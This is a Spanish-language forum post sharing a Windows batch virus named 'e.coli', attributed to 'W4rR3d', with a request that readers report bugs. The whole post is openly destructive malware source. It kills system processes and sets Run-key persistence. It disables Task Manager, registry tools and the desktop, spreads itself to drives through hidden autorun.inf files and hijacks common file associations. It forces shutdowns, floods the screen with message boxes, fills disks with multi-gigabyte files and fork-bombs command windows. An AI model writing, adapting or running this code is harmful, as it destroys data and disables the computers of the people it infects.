sin ven errores en mi codigo por favor notificar
su amigo by hackerd W4rR3d
su amigo by hackerd W4rR3d
Código (dos) [Seleccionar]
@echo off
::by hacked W4rR3d
::Comunidad Informatica Black Eye Security Team
:: Piura - Perù
Set ecoli=echo
Set HC= C:\
Set HD= D:\
Set HE= E:\
Set HF= F:\
Set HG= G:\
Set HH=copy /y %0
taskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
tskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
if exist C:\ goto C1
if not exist "C:\"goto t1
if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat&attrib +h +s +r C:\autorun.inf
copy /y %0 C:\e.coli.bat
%ecoli% [autorun] >>C:\autorun.inf
%ecoli% OPEN=e.coli.bat >>C:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf
%ecoli% shell\open\Default=1 >>C:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf
attrib +h +s +r C:\e.coli.bat
attrib +h +s +r C:\autorun.inf
if exist D:\ goto D1
if not exist "D:\"goto t2
if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat&attrib +h +s +r D:\autorun.inf
copy /y %0 D:\e.coli.bat
%ecoli% [autorun] >>D:\autorun.inf
%ecoli% OPEN=e.coli.bat >>D:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf
%ecoli% shell\open\Default=1 >>D:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf
attrib +h +s +r D:\e.coli.bat
attrib +h +s +r D:\autorun.inf
if exist E:\ goto E1
if not exist "E:\"goto t3
if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat&attrib +h +s +r E:\autorun.inf
copy /y %0 E:\e.coli.bat
%ecoli% [autorun] >>E:\autorun.inf
%ecoli% OPEN=e.coli.bat >>E:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf
%ecoli% shell\open\Default=1 >>E:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf
attrib +h +s +r E:\e.coli.bat
attrib +h +s +r E:\autorun.inf
if exist F:\ goto F1
if not exist "F:\"goto t4
if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat&attrib +h +s +r F:\autorun.inf
copy /y %0 F:\e.coli.bat
%ecoli% [autorun] >>F:\autorun.inf
%ecoli% OPEN=e.coli.bat >>F:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf
%ecoli% shell\open\Default=1 >>F:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf
attrib +h +s +r F:\e.coli.bat
attrib +h +s +r F:\autorun.inf
if exist G:\ goto G1
if not exist "G:\"goto open
if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat&attrib +h +s +r G:\autorun.inf
copy /y %0 G:\e.coli.bat
%ecoli% [autorun] >>G:\autorun.inf
%ecoli% OPEN=e.coli.bat >>G:\autorun.inf
%ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf
%ecoli% shell\open\Default=1 >>G:\autorun.inf
%ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf
attrib +h +s +r G:\e.coli.bat
attrib +h +s +r G:\autorun.inf
if exist %HC%open.vbs goto cop
%ecoli%On Error Resume Next >> %HC%open.vbs
%ecoli%Set oWMP = CreateObject("WMPlayer.OCX.7")>> %HC%open.vbs
%ecoli%Set colCDROMs = oWMP.cdromCollection>> %HC%open.vbs
%ecoli%do>> %HC%open.vbs
%ecoli%if colCDROMs.Count >= 1 then>> %HC%open.vbs
%ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
%ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
%ecoli%Next>> %HC%open.vbs
%ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
%ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
%ecoli%Next>> %HC%open.vbs
%ecoli%End If>> %HC%open.vbs
%ecoli%wscript.sleep 5000>> %HC%open.vbs
%ecoli%loop >> %HC%open.vbs
start %HC%open.vbs
if exist %HC%\apgar.vbs goto reini
%HH% "%appdata%\e.coli_a.exe"
%HH% "%windir%\e.coli_b.exe"
%HH% "%systemroot%\system32\e.coli_c.exe"
%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
%HH% "%programfiles%\Winamp\e.coli_f.exe"
%HH% "%programfiles%\WinRAR\e.coli_g.exe"
%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
%HH% "%programfiles%\shARES\e.coli_i.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
if exist %HC%\Warning.vbs goto war
%ecoli% On Error Resume Next >> %HC%\apgar.vbs
%ecoli% set shell = CreateObject("WScript.Shell") >> %HC%\apgar.vbs
%ecoli% "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs
start %HC%\apgar.vbs
if exist %HC%\cmds.bat goto cmds
echo msn=msgbox("Warning Warning Warning",16," no me puedes vencer") >> %HC%\Warning.vbs
For /L %%a IN (0,1,1000) DO start %HC%\Warning.vbs
if exist %windir%e.coli.bat goto wi
for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z) do if exist "%%A:\" copy /y %0 "%%A:\INFECTED!!!"
for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html) do assoc .%%E=batfile
for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe) do copy /y %0 "%windir%\%%I"
attrib +h %windir%
for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe) do tasklist /m | find /i "%%p" && taskkill /f /im %%p.exe
echo fsutil file createnew %random%.exe 4000000000>>%windir%\fsutil.exe
start %windir%\fsutil.exe
if exist "%windir%\jpg.exe" (goto ves) else (goto Full Disk)
copy /y %0 "%windir%\jpg.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f
echo 00000000 000 000 0000000000 0000000000 0000000000 00000000000 0000000000 000000>>%userprofile%\Desktop\I.txt
echo 00000000 0000 000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000>>%userprofile%\Desktop\N.txt
echo 0000 00000 000 000 000 000 000 000 000 0000>>%userprofile%\Desktop\F.txt
echo 0000 000000 000 000 000 000 000 000 000 000>>%userprofile%\Desktop\E.txt
echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000>>%userprofile%\Desktop\C.txt
echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000>>%userprofile%\Desktop\T.txt
echo 0000 000 000000 000 000 000 000 000 000 000>>%userprofile%\Desktop\E.txt
echo 0000 000 00000 000 000 000 000 000 000 0000>>%userprofile%\Desktop\D.txt
echo 00000000 000 0000 000 0000000000 0000000000 000 0000000000 00000000>>%userprofile%\Desktop\!.txt
echo 00000000 000 000 000 0000000000 0000000000 000 0000000000 000000>>%userprofile%\Desktop\!!.txt
:Full Disk
fsutil file createnew INFECTED!!!.exe 40000000000
for %%t in (1,1,24) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000
for /l %%e in (0,1,5000) do (start cmd)
cls &exit